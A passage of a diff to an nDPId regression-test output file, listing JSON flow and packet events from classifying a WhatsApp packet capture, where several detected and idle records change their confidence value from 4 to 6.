-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655052148615,"flow_last_seen":1655052148758,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655052148758,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43152,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655052148615,"flow_last_seen":1655052148758,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655052148758,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43152,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655052438619,"flow_last_seen":1655052438619,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655052438619,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46042,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1655052438619,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655052438619,"pkt":"eJS0JASgYDjgxTWgCABFAAA8kqtAAD8Gb6bAqAJkszzDIbPaFGZdYrgnAAAAAKAC\/\/9CuwAAAgQFtAQCCAoFPujPAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1655052438652,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655052438652,"pkt":"eJS0JASgYDjgxTWgCABFAAA0kqxAAD8Gb63AqAJkszzDIbPaFGZdYrgoyEw0oYAQAKw1RwAAAQEICgU+6PHmsVfE"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1655052438653,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655052438653,"pkt":"eJS0JASgYDjgxTWgCABFAAA4kq1AAD8Gb6jAqAJkszzDIbPaFGZdYrgoyEw0oYAYAKzv9AAAAQEICgU+6PLmsVfERUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655052438619,"flow_last_seen":1655052438654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655052438654,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46042,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":201,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655044965142,"flow_last_seen":1655044965409,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655052438807,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45754,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655052438619,"flow_last_seen":1655052438654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655052438654,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46042,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":201,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655044965142,"flow_last_seen":1655044965409,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655052438807,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45754,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":201,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":201,"packets-processed":200,"total-skipped-flows":0,"total-l4-payload-len":16467,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":25,"total-detection-updates":0,"total-updates":0,"current-active-flows":8,"total-active-flows":25,"total-idle-flows":17,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":162,"global_ts_msec":1655052853504} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655052853504,"flow_last_seen":1655052853504,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655052853504,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1655052853504,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655052853504,"pkt":"eJS0JASgYDjgxTWgCABFAAA8WWJAAD8GqN\/AqAJkszzDMajGFGY2dfJkAAAAAKAC\/\/87qwAAAgQFtAQCCAo3+7TWAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1655052853586,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655052853586,"pkt":"eJS0JASgYDjgxTWgCABFAAA0WWNAAD8GqObAqAJkszzDMajGFGY2dfJl9PmkqoAQAICs4QAAAQEICjf7tS9HlNt1"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1655052853610,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655052853610,"pkt":"eJS0JASgYDjgxTWgCABFAAA4WWRAAD8GqOHAqAJkszzDMajGFGY2dfJl9PmkqoAYAIBnfgAAAQEICjf7tUFHlNt1RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655052853504,"flow_last_seen":1655052853647,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655052853647,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43206,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655052853504,"flow_last_seen":1655052853647,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655052853647,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43206,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":209,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":209,"packets-processed":208,"total-skipped-flows":0,"total-l4-payload-len":16801,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":26,"total-detection-updates":0,"total-updates":0,"current-active-flows":9,"total-active-flows":26,"total-idle-flows":17,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":168,"global_ts_msec":1655053633670} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655053633670,"flow_last_seen":1655053633670,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655053633670,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43230,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1655053633670,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655053633670,"pkt":"eJS0JASgYDjgxTWgCABFAAA8mVhAAD8GaOnAqAJkszzDMajeFGZP5tJgAAAAAKAC\/\/\/ryAAAAgQFtAQCCAo3\/AszAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1655053633701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655053633701,"pkt":"eJS0JASgYDjgxTWgCABFAAA0mVlAAD8GaPDAqAJkszzDMajeFGZP5tJhk8uMoIAQAIDJOAAAAQEICjf8C1OqRoX7"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1655053633708,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655053633708,"pkt":"eJS0JASgYDjgxTWgCABFAAA4mVpAAD8GaOvAqAJkszzDMajeFGZP5tJhk8uMoIAYAICD4QAAAQEICjf8C1mqRoX7RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655053633670,"flow_last_seen":1655053633738,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655053633738,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43230,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":217,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655045751925,"flow_last_seen":1655045752178,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655053633932,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45824,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655053633670,"flow_last_seen":1655053633738,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655053633738,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43230,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":217,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655045751925,"flow_last_seen":1655045752178,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655053633932,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45824,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":217,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":217,"packets-processed":216,"total-skipped-flows":0,"total-l4-payload-len":17135,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":27,"total-detection-updates":0,"total-updates":0,"current-active-flows":9,"total-active-flows":27,"total-idle-flows":18,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":175,"global_ts_msec":1655054457330} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655054457330,"flow_last_seen":1655054457330,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655054457330,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46468,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1655054457330,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655054457330,"pkt":"eJS0JASgYDjgxTWgCABFAAA8VnBAAD8Gq+HAqAJkszzDIbWEFGa\/BmevAAAAAKAC\/\/\/mlQAAAgQFtAQCCAoFUzIKAAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1655054457362,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655054457362,"pkt":"eJS0JASgYDjgxTWgCABFAAA0VnFAAD8Gq+jAqAJkszzDIbWEFGa\/Bmewdx424oAQAKySKwAAAQEICgVTMiqQiUPS"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1655054457363,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655054457363,"pkt":"eJS0JASgYDjgxTWgCABFAAA4VnJAAD8Gq+PAqAJkszzDIbWEFGa\/Bmewdx424oAYAKxM2QAAAQEICgVTMiuQiUPSRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655054457330,"flow_last_seen":1655054457365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655054457365,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46468,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655054457330,"flow_last_seen":1655054457365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655054457365,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46468,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":225,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":225,"packets-processed":224,"total-skipped-flows":0,"total-l4-payload-len":18408,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":28,"total-detection-updates":0,"total-updates":0,"current-active-flows":10,"total-active-flows":28,"total-idle-flows":18,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":181,"global_ts_msec":1655056441533} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655056441533,"flow_last_seen":1655056441533,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655056441533,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47360,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1655056441533,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655056441533,"pkt":"eJS0JASgYDjgxTWgCABFAAA8SQJAAD8GuU\/AqAJkszzDIbkAFGYVt3HxAAAAAKAC\/\/87QgAAAgQFtAQCCAoFcXjRAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1655056441563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655056441563,"pkt":"eJS0JASgYDjgxTWgCABFAAA0SQNAAD8GuVbAqAJkszzDIbkAFGYVt3Hym+tfO4AQAKzuQwAAAQEICgVxePCucNFZ"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1655056441564,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655056441564,"pkt":"eJS0JASgYDjgxTWgCABFAAA4SQRAAD8GuVHAqAJkszzDIbkAFGYVt3Hym+tfO4AYAKyo8gAAAQEICgVxePCucNFZRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":228,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655056441533,"flow_last_seen":1655056441565,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655056441565,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47360,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":228,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655056441533,"flow_last_seen":1655056441565,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655056441565,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47360,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":233,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":233,"packets-processed":232,"total-skipped-flows":0,"total-l4-payload-len":19681,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":29,"total-detection-updates":0,"total-updates":0,"current-active-flows":11,"total-active-flows":29,"total-idle-flows":18,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":187,"global_ts_msec":1655059510580} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655059510580,"flow_last_seen":1655059510580,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655059510580,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":39828,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1655059510580,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655059510580,"pkt":"eJS0JASgYDjgxTWgCABFAAA8GcJAAD8G6I\/AqAJkszzDIZuUFGY95P\/EAAAAAKAC\/\/\/fxAAAAgQFtAQCCAoFoDuLAAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1655059510610,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655059510610,"pkt":"eJS0JASgYDjgxTWgCABFAAA0GcNAAD8G6JbAqAJkszzDIZuUFGY95P\/FCFqhLIAQAKyMSwAAAQEICgWgO6lMbYt5"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1655059510610,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655059510610,"pkt":"eJS0JASgYDjgxTWgCABFAAA4GcRAAD8G6JHAqAJkszzDIZuUFGY95P\/FCFqhLIAYAKxG+gAAAQEICgWgO6lMbYt5RUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655059510580,"flow_last_seen":1655059510611,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655059510611,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":39828,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":241,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655051492307,"flow_last_seen":1655051493108,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1655059510757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43084,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 